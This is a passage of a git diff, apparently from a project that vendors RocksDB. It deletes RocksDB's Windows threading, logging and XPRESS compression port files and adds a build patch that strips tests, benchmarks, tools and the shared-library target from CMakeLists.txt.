-size_t WinLogger::GetLogFileSize() const { return log_size_; }
-
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/port/win/win_logger.h b/thirdparty/rocksdb/port/win/win_logger.h
deleted file mode 100644
index 2d44f50..0000000
--- a/thirdparty/rocksdb/port/win/win_logger.h
+++ /dev/null
@@ -1,63 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// Logger implementation that can be shared by all environments
-// where enough posix functionality is available.
-
-#pragma once
-
-#include <atomic>
-
-#include "rocksdb/env.h"
-
-#include <stdint.h>
-#include <windows.h>
-
-namespace rocksdb {
-
-class Env;
-
-namespace port {
-
-class WinLogger : public rocksdb::Logger {
- public:
-  WinLogger(uint64_t (*gettid)(), Env* env, HANDLE file,
-            const InfoLogLevel log_level = InfoLogLevel::ERROR_LEVEL);
-
-  virtual ~WinLogger();
-
-  WinLogger(const WinLogger&) = delete;
-
-  WinLogger& operator=(const WinLogger&) = delete;
-
-  void close();
-
-  void Flush() override;
-
-  using rocksdb::Logger::Logv;
-  void Logv(const char* format, va_list ap) override;
-
-  size_t GetLogFileSize() const override;
-
-  void DebugWriter(const char* str, int len);
-
- private:
-  HANDLE file_;
-  uint64_t (*gettid_)();  // Return the thread id for the current thread
-  std::atomic_size_t log_size_;
-  std::atomic_uint_fast64_t last_flush_micros_;
-  Env* env_;
-  bool flush_pending_;
-
-  const static uint64_t flush_every_seconds_ = 5;
-};
-
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/port/win/win_thread.cc b/thirdparty/rocksdb/port/win/win_thread.cc
deleted file mode 100644
index e55ca74..0000000
--- a/thirdparty/rocksdb/port/win/win_thread.cc
+++ /dev/null
@@ -1,166 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "port/win/win_thread.h"
-
-#include <assert.h>
-#include <process.h> // __beginthreadex
-#include <windows.h>
-
-#include <stdexcept>
-#include <system_error>
-#include <thread>
-
-namespace rocksdb {
-namespace port {
-
-struct WindowsThread::Data {
-
-  std::function<void()> func_;
-  uintptr_t             handle_;
-
-  Data(std::function<void()>&& func) :
-    func_(std::move(func)),
-    handle_(0) {
-  }
-
-  Data(const Data&) = delete;
-  Data& operator=(const Data&) = delete;
-
-  static unsigned int __stdcall ThreadProc(void* arg);
-};
-
-
-void WindowsThread::Init(std::function<void()>&& func) {
-
-  data_.reset(new Data(std::move(func)));
-
-  data_->handle_ = _beginthreadex(NULL,
-    0,    // stack size
-    &Data::ThreadProc,
-    data_.get(),
-    0,   // init flag
-    &th_id_);
-
-  if (data_->handle_ == 0) {
-    throw std::system_error(std::make_error_code(
-      std::errc::resource_unavailable_try_again),
-      "Unable to create a thread");
-  }
-}
-
-WindowsThread::WindowsThread() :
-  data_(nullptr),
-  th_id_(0)
-{}
-
-
-WindowsThread::~WindowsThread() {
-  // Must be joined or detached
-  // before destruction.
-  // This is the same as std::thread
-  if (data_) {
-    if (joinable()) {
-      assert(false);
-      std::terminate();
-    }
-    data_.reset();
-  }
-}
-
-WindowsThread::WindowsThread(WindowsThread&& o) noexcept :
-  WindowsThread() {
-  *this = std::move(o);
-}
-
-WindowsThread& WindowsThread::operator=(WindowsThread&& o) noexcept {
-
-  if (joinable()) {
-    assert(false);
-    std::terminate();
-  }
-
-  data_ = std::move(o.data_);
-
-  // Per spec both instances will have the same id
-  th_id_ = o.th_id_;
-
-  return *this;
-}
-
-bool WindowsThread::joinable() const {
-  return (data_ && data_->handle_ != 0);
-}
-
-WindowsThread::native_handle_type WindowsThread::native_handle() const {
-  return reinterpret_cast<native_handle_type>(data_->handle_);
-}
-
-unsigned WindowsThread::hardware_concurrency() {
-  return std::thread::hardware_concurrency();
-}
-
-void WindowsThread::join() {
-
-  if (!joinable()) {
-    assert(false);
-    throw std::system_error(
-      std::make_error_code(std::errc::invalid_argument),
-      "Thread is no longer joinable");
-  }
-
-  if (GetThreadId(GetCurrentThread()) == th_id_) {
-    assert(false);
-    throw std::system_error(
-      std::make_error_code(std::errc::resource_deadlock_would_occur),
-      "Can not join itself");
-  }
-
-  auto ret = WaitForSingleObject(reinterpret_cast<HANDLE>(data_->handle_),
-    INFINITE);
-  if (ret != WAIT_OBJECT_0) {
-    auto lastError = GetLastError();
-    assert(false);
-    throw std::system_error(static_cast<int>(lastError),
-      std::system_category(),
-      "WaitForSingleObjectFailed");
-  }
-
-  CloseHandle(reinterpret_cast<HANDLE>(data_->handle_));
-  data_->handle_ = 0;
-}
-
-bool WindowsThread::detach() {
-
-  if (!joinable()) {
-    assert(false);
-    throw std::system_error(
-      std::make_error_code(std::errc::invalid_argument),
-      "Thread is no longer available");
-  }
-
-  BOOL ret = CloseHandle(reinterpret_cast<HANDLE>(data_->handle_));
-  data_->handle_ = 0;
-
-  return (ret == TRUE);
-}
-
-void  WindowsThread::swap(WindowsThread& o) {
-  data_.swap(o.data_);
-  std::swap(th_id_, o.th_id_);
-}
-
-unsigned int __stdcall  WindowsThread::Data::ThreadProc(void* arg) {
-  auto data = reinterpret_cast<WindowsThread::Data*>(arg);
-  data->func_();
-  _endthreadex(0);
-  return 0;
-}
-} // namespace port
-} // namespace rocksdb
diff --git a/thirdparty/rocksdb/port/win/win_thread.h b/thirdparty/rocksdb/port/win/win_thread.h
deleted file mode 100644
index 993cc02..0000000
--- a/thirdparty/rocksdb/port/win/win_thread.h
+++ /dev/null
@@ -1,121 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-
-#include <memory>
-#include <functional>
-#include <type_traits>
-
-namespace rocksdb {
-namespace port {
-
-// This class is a replacement for std::thread
-// 2 reasons we do not like std::thread:
-//  -- is that it dynamically allocates its internals that are automatically
-//     freed when  the thread terminates and not on the destruction of the
-//     object. This makes it difficult to control the source of memory
-//     allocation 
-//  -  This implements Pimpl so we can easily replace the guts of the
-//      object in our private version if necessary.
-class WindowsThread {
-
-  struct Data;
-
-  std::unique_ptr<Data>  data_;
-  unsigned int           th_id_;
-
-  void Init(std::function<void()>&&);
-
-public:
-
-  typedef void* native_handle_type;
-
-  // Construct with no thread
-  WindowsThread();
-
-  // Template constructor
-  // 
-  // This templated constructor accomplishes several things
-  //
-  // - Allows the class as whole to be not a template
-  //
-  // - take "universal" references to support both _lvalues and _rvalues
-  //
-  // -  because this constructor is a catchall case in many respects it
-  //    may prevent us from using both the default __ctor, the move __ctor.
-  //    Also it may circumvent copy __ctor deletion. To work around this
-  //    we make sure this one has at least one argument and eliminate
-  //    it from the overload  selection when WindowsThread is the first
-  //    argument.
-  //
-  // - construct with Fx(Ax...) with a variable number of types/arguments.
-  //
-  // - Gathers together the callable object with its arguments and constructs
-  //   a single callable entity
-  //
-  // - Makes use of std::function to convert it to a specification-template
-  //   dependent type that both checks the signature conformance to ensure
-  //   that all of the necessary arguments are provided and allows pimpl
-  //   implementation.
-  template<class Fn,
-    class... Args,
-    class = typename std::enable_if<
-      !std::is_same<typename std::decay<Fn>::type,
-                    WindowsThread>::value>::type>
-  explicit WindowsThread(Fn&& fx, Args&&... ax) :
-      WindowsThread() {
-
-    // Use binder to create a single callable entity
-    auto binder = std::bind(std::forward<Fn>(fx),
-      std::forward<Args>(ax)...);
-    // Use std::function to take advantage of the type erasure
-    // so we can still hide implementation within pimpl
-    // This also makes sure that the binder signature is compliant
-    std::function<void()> target = binder;
-
-    Init(std::move(target));
-  }
-
-
-  ~WindowsThread();
-
-  WindowsThread(const WindowsThread&) = delete;
-
-  WindowsThread& operator=(const WindowsThread&) = delete;
-
-  WindowsThread(WindowsThread&&) noexcept;
-
-  WindowsThread& operator=(WindowsThread&&) noexcept;
-
-  bool joinable() const;
-
-  unsigned int get_id() const { return th_id_; }
-
-  native_handle_type native_handle() const;
-
-  static unsigned hardware_concurrency();
-
-  void join();
-
-  bool detach();
-
-  void swap(WindowsThread&);
-};
-} // namespace port
-} // namespace rocksdb
-
-namespace std {
-  inline
-  void swap(rocksdb::port::WindowsThread& th1, 
-    rocksdb::port::WindowsThread& th2) {
-    th1.swap(th2);
-  }
-} // namespace std
-
diff --git a/thirdparty/rocksdb/port/win/xpress_win.cc b/thirdparty/rocksdb/port/win/xpress_win.cc
deleted file mode 100644
index 9ab23c5..0000000
--- a/thirdparty/rocksdb/port/win/xpress_win.cc
+++ /dev/null
@@ -1,226 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "port/win/xpress_win.h"
-#include <windows.h>
-
-#include <cassert>
-#include <memory>
-#include <limits>
-#include <iostream>
-
-#ifdef XPRESS
-
-// Put this under ifdef so windows systems w/o this
-// can still build
-#include <compressapi.h>
-
-namespace rocksdb {
-namespace port {
-namespace xpress {
-
-// Helpers
-namespace {
-
-auto CloseCompressorFun = [](void* h) {
-  if (NULL != h) {
-    ::CloseCompressor(reinterpret_cast<COMPRESSOR_HANDLE>(h));
-  }
-};
-
-auto CloseDecompressorFun = [](void* h) {
-  if (NULL != h) {
-    ::CloseDecompressor(reinterpret_cast<DECOMPRESSOR_HANDLE>(h));
-  }
-};
-}
-
-bool Compress(const char* input, size_t length, std::string* output) {
-
-  assert(input != nullptr);
-  assert(output != nullptr);
-
-  if (length == 0) {
-    output->clear();
-    return true;
-  }
-
-  COMPRESS_ALLOCATION_ROUTINES* allocRoutinesPtr = nullptr;
-
-  COMPRESSOR_HANDLE compressor = NULL;
-
-  BOOL success = CreateCompressor(
-    COMPRESS_ALGORITHM_XPRESS, //  Compression Algorithm
-    allocRoutinesPtr,       //  Optional allocation routine
-    &compressor);              //  Handle
-
-  if (!success) {
-#ifdef _DEBUG
-    std::cerr << "XPRESS: Failed to create Compressor LastError: " <<
-      GetLastError() << std::endl;
-#endif
-    return false;
-  }
-
-  std::unique_ptr<void, decltype(CloseCompressorFun)>
-    compressorGuard(compressor, CloseCompressorFun);
-
-  SIZE_T compressedBufferSize = 0;
-
-  //  Query compressed buffer size.
-  success = ::Compress(
-    compressor,                 //  Compressor Handle
-    const_cast<char*>(input),   //  Input buffer
-    length,                     //  Uncompressed data size
-    NULL,                       //  Compressed Buffer
-    0,                          //  Compressed Buffer size
-    &compressedBufferSize);     //  Compressed Data size
-
-  if (!success) {
-
-    auto lastError = GetLastError();
-
-    if (lastError != ERROR_INSUFFICIENT_BUFFER) {
-#ifdef _DEBUG
-      std::cerr <<
-        "XPRESS: Failed to estimate compressed buffer size LastError " <<
-        lastError << std::endl;
-#endif
-      return false;
-    }
-  }
-
-  assert(compressedBufferSize > 0);
-
-  std::string result;
-  result.resize(compressedBufferSize);
-
-  SIZE_T compressedDataSize = 0;
-
-  //  Compress
-  success = ::Compress(
-    compressor,                  //  Compressor Handle
-    const_cast<char*>(input),    //  Input buffer
-    length,                      //  Uncompressed data size
-    &result[0],                  //  Compressed Buffer
-    compressedBufferSize,        //  Compressed Buffer size
-    &compressedDataSize);        //  Compressed Data size
-
-  if (!success) {
-#ifdef _DEBUG
-    std::cerr << "XPRESS: Failed to compress LastError " <<
-      GetLastError() << std::endl;
-#endif
-    return false;
-  }
-
-  result.resize(compressedDataSize);
-  output->swap(result);
-
-  return true;
-}
-
-char* Decompress(const char* input_data, size_t input_length,
-  int* decompress_size) {
-
-  assert(input_data != nullptr);
-  assert(decompress_size != nullptr);
-
-  if (input_length == 0) {
-    return nullptr;
-  }
-
-  COMPRESS_ALLOCATION_ROUTINES* allocRoutinesPtr = nullptr;
-
-  DECOMPRESSOR_HANDLE decompressor = NULL;
-
-  BOOL success = CreateDecompressor(
-    COMPRESS_ALGORITHM_XPRESS, //  Compression Algorithm
-    allocRoutinesPtr,          //  Optional allocation routine
-    &decompressor);            //  Handle
-
-
-  if (!success) {
-#ifdef _DEBUG
-    std::cerr << "XPRESS: Failed to create Decompressor LastError "
-      << GetLastError() << std::endl;
-#endif
-    return nullptr;
-  }
-
-  std::unique_ptr<void, decltype(CloseDecompressorFun)>
-    compressorGuard(decompressor, CloseDecompressorFun);
-
-  SIZE_T decompressedBufferSize = 0;
-
-  success = ::Decompress(
-    decompressor,          //  Compressor Handle
-    const_cast<char*>(input_data),  //  Compressed data
-    input_length,               //  Compressed data size
-    NULL,                        //  Buffer set to NULL
-    0,                           //  Buffer size set to 0
-    &decompressedBufferSize);    //  Decompressed Data size
-
-  if (!success) {
-
-    auto lastError = GetLastError();
-
-    if (lastError != ERROR_INSUFFICIENT_BUFFER) {
-#ifdef _DEBUG
-      std::cerr
-        << "XPRESS: Failed to estimate decompressed buffer size LastError "
-        << lastError << std::endl;
-#endif
-      return nullptr;
-    }
-  }
-
-  assert(decompressedBufferSize > 0);
-
-  // On Windows we are limited to a 32-bit int for the
-  // output data size argument
-  // so we hopefully never get here
-  if (decompressedBufferSize > std::numeric_limits<int>::max()) {
-    assert(false);
-    return nullptr;
-  }
-
-  // The callers are deallocating using delete[]
-  // thus we must allocate with new[]
-  std::unique_ptr<char[]> outputBuffer(new char[decompressedBufferSize]);
-
-  SIZE_T decompressedDataSize = 0;
-
-  success = ::Decompress(
-    decompressor,
-    const_cast<char*>(input_data),
-    input_length,
-    outputBuffer.get(),
-    decompressedBufferSize,
-    &decompressedDataSize);
-
-  if (!success) {
-#ifdef _DEBUG
-    std::cerr <<
-      "XPRESS: Failed to decompress LastError " <<
-      GetLastError() << std::endl;
-#endif
-    return nullptr;
-  }
-
-  *decompress_size = static_cast<int>(decompressedDataSize);
-
-  // Return the raw buffer to the caller supporting the tradition
-  return outputBuffer.release();
-}
-}
-}
-}
-
-#endif
diff --git a/thirdparty/rocksdb/port/win/xpress_win.h b/thirdparty/rocksdb/port/win/xpress_win.h
deleted file mode 100644
index 5b11e7d..0000000
--- a/thirdparty/rocksdb/port/win/xpress_win.h
+++ /dev/null
@@ -1,26 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-
-#include <string>
-
-namespace rocksdb {
-namespace port {
-namespace xpress {
-
-bool Compress(const char* input, size_t length, std::string* output);
-
-char* Decompress(const char* input_data, size_t input_length,
-                 int* decompress_size);
-
-}
-}
-}
-
diff --git a/thirdparty/rocksdb/port/xpress.h b/thirdparty/rocksdb/port/xpress.h
deleted file mode 100644
index 457025f..0000000
--- a/thirdparty/rocksdb/port/xpress.h
+++ /dev/null
@@ -1,17 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-
-// Xpress on Windows is implemeted using Win API
-#if defined(ROCKSDB_PLATFORM_POSIX)
-#error "Xpress compression not implemented"
-#elif defined(OS_WIN)
-#include "port/win/xpress_win.h"
-#endif
diff --git a/thirdparty/rocksdb/rocksdb-BUILD.patch b/thirdparty/rocksdb/rocksdb-BUILD.patch
new file mode 100644
index 0000000..c755944
--- /dev/null
+++ b/thirdparty/rocksdb/rocksdb-BUILD.patch
@@ -0,0 +1,458 @@
+diff --git a/CMakeLists.txt b/CMakeLists.txt
+index 45bb105a2..a77bdb8bb 100644
+--- a/CMakeLists.txt
++++ b/CMakeLists.txt
+@@ -348,10 +348,8 @@ endif()
+ 
+ include_directories(${PROJECT_SOURCE_DIR})
+ include_directories(${PROJECT_SOURCE_DIR}/include)
+-include_directories(SYSTEM ${PROJECT_SOURCE_DIR}/third-party/gtest-1.7.0/fused-src)
+ find_package(Threads REQUIRED)
+ 
+-add_subdirectory(third-party/gtest-1.7.0/fused-src/gtest)
+ 
+ # Main library source code
+ 
+@@ -502,10 +500,8 @@ set(SOURCES
+         util/status_message.cc
+         util/string_util.cc
+         util/sync_point.cc
+-        util/testutil.cc
+         util/thread_local.cc
+         util/threadpool_imp.cc
+-        util/transaction_test_util.cc
+         util/xxhash.cc
+         utilities/backupable/backupable_db.cc
+         utilities/blob_db/blob_db.cc
+@@ -574,12 +570,12 @@ if(WIN32)
+     port/win/win_logger.cc
+     port/win/win_thread.cc
+     port/win/xpress_win.cc)
+-	
++
+ if(WITH_JEMALLOC)
+   list(APPEND SOURCES
+     port/win/win_jemalloc.cc)
+ endif()
+-	
++
+ else()
+   list(APPEND SOURCES
+     port/port_posix.cc
+@@ -588,24 +584,28 @@ else()
+ endif()
+ 
+ set(ROCKSDB_STATIC_LIB rocksdb${ARTIFACT_SUFFIX})
+-set(ROCKSDB_SHARED_LIB rocksdb-shared${ARTIFACT_SUFFIX})
++# commented out to avoid building the shared lib
++#set(ROCKSDB_SHARED_LIB rocksdb-shared${ARTIFACT_SUFFIX})
+ set(ROCKSDB_IMPORT_LIB ${ROCKSDB_SHARED_LIB})
+ if(WIN32)
+-  set(SYSTEM_LIBS ${SYSTEM_LIBS} Shlwapi.lib Rpcrt4.lib)
++  #set(SYSTEM_LIBS ${SYSTEM_LIBS} shlwapi.lib Rpcrt4.lib)
++  set(SYSTEM_LIBS ${SYSTEM_LIBS}  Rpcrt4.lib)
+   set(LIBS ${ROCKSDB_STATIC_LIB} ${THIRDPARTY_LIBS} ${SYSTEM_LIBS})
+ else()
+   set(SYSTEM_LIBS ${CMAKE_THREAD_LIBS_INIT})
+-  set(LIBS ${ROCKSDB_SHARED_LIB} ${THIRDPARTY_LIBS} ${SYSTEM_LIBS})
+-
+-  add_library(${ROCKSDB_SHARED_LIB} SHARED ${SOURCES})
+-  target_link_libraries(${ROCKSDB_SHARED_LIB}
+-    ${THIRDPARTY_LIBS} ${SYSTEM_LIBS})
+-  set_target_properties(${ROCKSDB_SHARED_LIB} PROPERTIES
+-                        LINKER_LANGUAGE CXX
+-                        VERSION ${ROCKSDB_VERSION}
+-                        SOVERSION ${ROCKSDB_VERSION_MAJOR}
+-                        CXX_STANDARD 11
+-                        OUTPUT_NAME "rocksdb")
++  set(LIBS ${ROCKSDB_STATIC_LIB} ${THIRDPARTY_LIBS} ${SYSTEM_LIBS})
++# commented out to avoid building the shared lib
++# as there is no reason
++#add_library(${ROCKSDB_SHARED_LIB} SHARED ${SOURCES})
++
++# target_link_libraries(${ROCKSDB_SHARED_LIB}
++#    ${THIRDPARTY_LIBS} ${SYSTEM_LIBS})
++#  set_target_properties(${ROCKSDB_SHARED_LIB} PROPERTIES
++#                        LINKER_LANGUAGE CXX
++#                        VERSION ${ROCKSDB_VERSION}
++#                        SOVERSION ${ROCKSDB_VERSION_MAJOR}
++#                        CXX_STANDARD 11
++#                        OUTPUT_NAME "rocksdb")
+ endif()
+ 
+ option(WITH_LIBRADOS "Build with librados" OFF)
+@@ -620,16 +620,15 @@ target_link_libraries(${ROCKSDB_STATIC_LIB}
+   ${THIRDPARTY_LIBS} ${SYSTEM_LIBS})
+ 
+ if(WIN32)
+-  add_library(${ROCKSDB_IMPORT_LIB} SHARED ${SOURCES})
+-  target_link_libraries(${ROCKSDB_IMPORT_LIB}
+-    ${THIRDPARTY_LIBS} ${SYSTEM_LIBS})
+-  set_target_properties(${ROCKSDB_IMPORT_LIB} PROPERTIES
+-    COMPILE_DEFINITIONS "ROCKSDB_DLL;ROCKSDB_LIBRARY_EXPORTS")
++#  add_library(${ROCKSDB_IMPORT_LIB} SHARED ${SOURCES})
++  #target_link_libraries(${ROCKSDB_IMPORT_LIB}  ${SYSTEM_LIBS})
++  #set_target_properties(${ROCKSDB_IMPORT_LIB} PROPERTIES
++   # COMPILE_DEFINITIONS "ROCKSDB_DLL;ROCKSDB_LIBRARY_EXPORTS")
+   if(MSVC)
+     set_target_properties(${ROCKSDB_STATIC_LIB} PROPERTIES
+       COMPILE_FLAGS "/Fd${CMAKE_CFG_INTDIR}/${ROCKSDB_STATIC_LIB}.pdb")
+-    set_target_properties(${ROCKSDB_IMPORT_LIB} PROPERTIES
+-      COMPILE_FLAGS "/Fd${CMAKE_CFG_INTDIR}/${ROCKSDB_IMPORT_LIB}.pdb")
++    #set_target_properties(${ROCKSDB_IMPORT_LIB} PROPERTIES
++      #COMPILE_FLAGS "/Fd${CMAKE_CFG_INTDIR}/${ROCKSDB_IMPORT_LIB}.pdb")
+   endif()
+ endif()
+ 
+@@ -663,11 +662,11 @@ if(NOT WIN32 OR ROCKSDB_INSTALL_ON_WINDOWS)
+     INSTALL_DESTINATION ${package_config_destination}
+   )
+ 
+-  write_basic_package_version_file(
+-    RocksDBConfigVersion.cmake
+-    VERSION ${ROCKSDB_VERSION}
+-    COMPATIBILITY SameMajorVersion
+-  )
++#  write_basic_package_version_file(
++#    RocksDBConfigVersion.cmake
++#    VERSION ${ROCKSDB_VERSION}
++#    COMPATIBILITY SameMajorVersion
++#  )
+ 
+   install(DIRECTORY include/rocksdb COMPONENT devel DESTINATION "${CMAKE_INSTALL_INCLUDEDIR}")
+ 
+@@ -695,13 +694,13 @@ if(NOT WIN32 OR ROCKSDB_INSTALL_ON_WINDOWS)
+     NAMESPACE RocksDB::
+   )
+ 
+-  install(
+-    FILES
+-    ${CMAKE_CURRENT_BINARY_DIR}/RocksDBConfig.cmake
+-    ${CMAKE_CURRENT_BINARY_DIR}/RocksDBConfigVersion.cmake
+-    COMPONENT devel
+-    DESTINATION ${package_config_destination}
+-  )
++#  install(
++#    FILES
++#    ${CMAKE_CURRENT_BINARY_DIR}/RocksDBConfig.cmake
++#    ${CMAKE_CURRENT_BINARY_DIR}/RocksDBConfigVersion.cmake
++#    COMPONENT devel
++#    DESTINATION ${package_config_destination}
++#  )
+ endif()
+ 
+ option(WITH_TESTS "build with tests" ON)
+@@ -806,7 +805,6 @@ if(WITH_TESTS)
+         util/file_reader_writer_test.cc
+         util/filelock_test.cc
+         util/hash_test.cc
+-        util/heap_test.cc
+         util/rate_limiter_test.cc
+         util/slice_transform_test.cc
+         util/timer_queue_test.cc
+@@ -845,20 +843,6 @@ if(WITH_TESTS)
+     list(APPEND TESTS utilities/env_librados_test.cc)
+   endif()
+ 
+-  set(BENCHMARKS
+-    cache/cache_bench.cc
+-    memtable/memtablerep_bench.cc
+-    tools/db_bench.cc
+-    table/table_reader_bench.cc
+-    utilities/column_aware_encoding_exp.cc
+-    utilities/persistent_cache/hash_table_bench.cc)
+-  add_library(testharness OBJECT util/testharness.cc)
+-  foreach(sourcefile ${BENCHMARKS})
+-    get_filename_component(exename ${sourcefile} NAME_WE)
+-    add_executable(${exename}${ARTIFACT_SUFFIX} ${sourcefile}
+-      $<TARGET_OBJECTS:testharness>)
+-    target_link_libraries(${exename}${ARTIFACT_SUFFIX} gtest ${LIBS})
+-  endforeach(sourcefile ${BENCHMARKS})
+ 
+   # For test util library that is build only in DEBUG mode
+   # and linked to tests. Add test only code that is not #ifdefed for Release here.
+@@ -884,23 +868,25 @@ if(WITH_TESTS)
+         )
+ 
+   # Tests are excluded from Release builds
+-  set(TEST_EXES ${TESTS})
+-
+-  foreach(sourcefile ${TEST_EXES})
+-      get_filename_component(exename ${sourcefile} NAME_WE)
+-      add_executable(${exename}${ARTIFACT_SUFFIX} ${sourcefile}
+-        $<TARGET_OBJECTS:testharness>)
+-      set_target_properties(${exename}${ARTIFACT_SUFFIX}
+-        PROPERTIES EXCLUDE_FROM_DEFAULT_BUILD_RELEASE 1
+-        EXCLUDE_FROM_DEFAULT_BUILD_MINRELEASE 1
+-        EXCLUDE_FROM_DEFAULT_BUILD_RELWITHDEBINFO 1
+-        )
+-      target_link_libraries(${exename}${ARTIFACT_SUFFIX} testutillib${ARTIFACT_SUFFIX} gtest ${LIBS})
+-      if(NOT "${exename}" MATCHES "db_sanity_test")
+-        add_test(NAME ${exename} COMMAND ${exename}${ARTIFACT_SUFFIX})
+-        add_dependencies(check ${exename}${ARTIFACT_SUFFIX})
+-      endif()
+-  endforeach(sourcefile ${TEST_EXES})
++  #set(TEST_EXES ${TESTS})
++
++  # while tests are not built, we want to ensure that any reference to gtest is removed in case the user
++  # builds rocksdb manually from our third party directory
++  #foreach(sourcefile ${TEST_EXES})
++  #    get_filename_component(exename ${sourcefile} NAME_WE)
++  #    add_executable(${exename}${ARTIFACT_SUFFIX} ${sourcefile}
++  #      $<TARGET_OBJECTS:testharness>)
++  #    set_target_properties(${exename}${ARTIFACT_SUFFIX}
++  #      PROPERTIES EXCLUDE_FROM_DEFAULT_BUILD_RELEASE 1
++  #      EXCLUDE_FROM_DEFAULT_BUILD_MINRELEASE 1
++  #      EXCLUDE_FROM_DEFAULT_BUILD_RELWITHDEBINFO 1
++  #      )
++  #    target_link_libraries(${exename}${ARTIFACT_SUFFIX} testutillib${ARTIFACT_SUFFIX} gtest ${LIBS})
++  #    if(NOT "${exename}" MATCHES "db_sanity_test")
++  #      add_test(NAME ${exename} COMMAND ${exename}${ARTIFACT_SUFFIX})
++  #      add_dependencies(check ${exename}${ARTIFACT_SUFFIX})
++  #    endif()
++  #endforeach(sourcefile ${TEST_EXES})
+ 
+   # C executables must link to a shared object
+   set(C_TESTS db/c_test.c)
+@@ -920,8 +906,3 @@ if(WITH_TESTS)
+       add_dependencies(check ${exename}${ARTIFACT_SUFFIX})
+   endforeach(sourcefile ${C_TEST_EXES})
+ endif()
+-
+-option(WITH_TOOLS "build with tools" ON)
+-if(WITH_TOOLS)
+-  add_subdirectory(tools)
+-endif()
+diff --git a/cmake/modules/FindJeMalloc.cmake b/cmake/modules/FindJeMalloc.cmake
+deleted file mode 100644
+index 7911f77c4..000000000
+--- a/cmake/modules/FindJeMalloc.cmake
++++ /dev/null
+@@ -1,21 +0,0 @@
+-# - Find JeMalloc library
+-# Find the native JeMalloc includes and library
+-#
+-# JEMALLOC_INCLUDE_DIR - where to find jemalloc.h, etc.
+-# JEMALLOC_LIBRARIES - List of libraries when using jemalloc.
+-# JEMALLOC_FOUND - True if jemalloc found.
+-
+-find_path(JEMALLOC_INCLUDE_DIR
+-  NAMES jemalloc/jemalloc.h
+-  HINTS ${JEMALLOC_ROOT_DIR}/include)
+-
+-find_library(JEMALLOC_LIBRARIES
+-  NAMES jemalloc
+-  HINTS ${JEMALLOC_ROOT_DIR}/lib)
+-
+-include(FindPackageHandleStandardArgs)
+-find_package_handle_standard_args(jemalloc DEFAULT_MSG JEMALLOC_LIBRARIES JEMALLOC_INCLUDE_DIR)
+-
+-mark_as_advanced(
+-  JEMALLOC_LIBRARIES
+-  JEMALLOC_INCLUDE_DIR)
+diff --git a/cmake/modules/Findbzip2.cmake b/cmake/modules/Findbzip2.cmake
+deleted file mode 100644
+index 87abbe941..000000000
+--- a/cmake/modules/Findbzip2.cmake
++++ /dev/null
+@@ -1,21 +0,0 @@
+-# - Find Bzip2
+-# Find the bzip2 compression library and includes
+-#
+-# BZIP2_INCLUDE_DIR - where to find bzlib.h, etc.
+-# BZIP2_LIBRARIES - List of libraries when using bzip2.
+-# BZIP2_FOUND - True if bzip2 found.
+-
+-find_path(BZIP2_INCLUDE_DIR
+-  NAMES bzlib.h
+-  HINTS ${BZIP2_ROOT_DIR}/include)
+-
+-find_library(BZIP2_LIBRARIES
+-  NAMES bz2
+-  HINTS ${BZIP2_ROOT_DIR}/lib)
+-
+-include(FindPackageHandleStandardArgs)
+-find_package_handle_standard_args(bzip2 DEFAULT_MSG BZIP2_LIBRARIES BZIP2_INCLUDE_DIR)
+-
+-mark_as_advanced(
+-  BZIP2_LIBRARIES
+-  BZIP2_INCLUDE_DIR)
+diff --git a/cmake/modules/Findlz4.cmake b/cmake/modules/Findlz4.cmake
+deleted file mode 100644
+index c34acef5e..000000000
+--- a/cmake/modules/Findlz4.cmake
++++ /dev/null
+@@ -1,21 +0,0 @@
+-# - Find Lz4
+-# Find the lz4 compression library and includes
+-#
+-# LZ4_INCLUDE_DIR - where to find lz4.h, etc.
+-# LZ4_LIBRARIES - List of libraries when using lz4.
+-# LZ4_FOUND - True if lz4 found.
+-
+-find_path(LZ4_INCLUDE_DIR
+-  NAMES lz4.h
+-  HINTS ${LZ4_ROOT_DIR}/include)
+-
+-find_library(LZ4_LIBRARIES
+-  NAMES lz4
+-  HINTS ${LZ4_ROOT_DIR}/lib)
+-
+-include(FindPackageHandleStandardArgs)
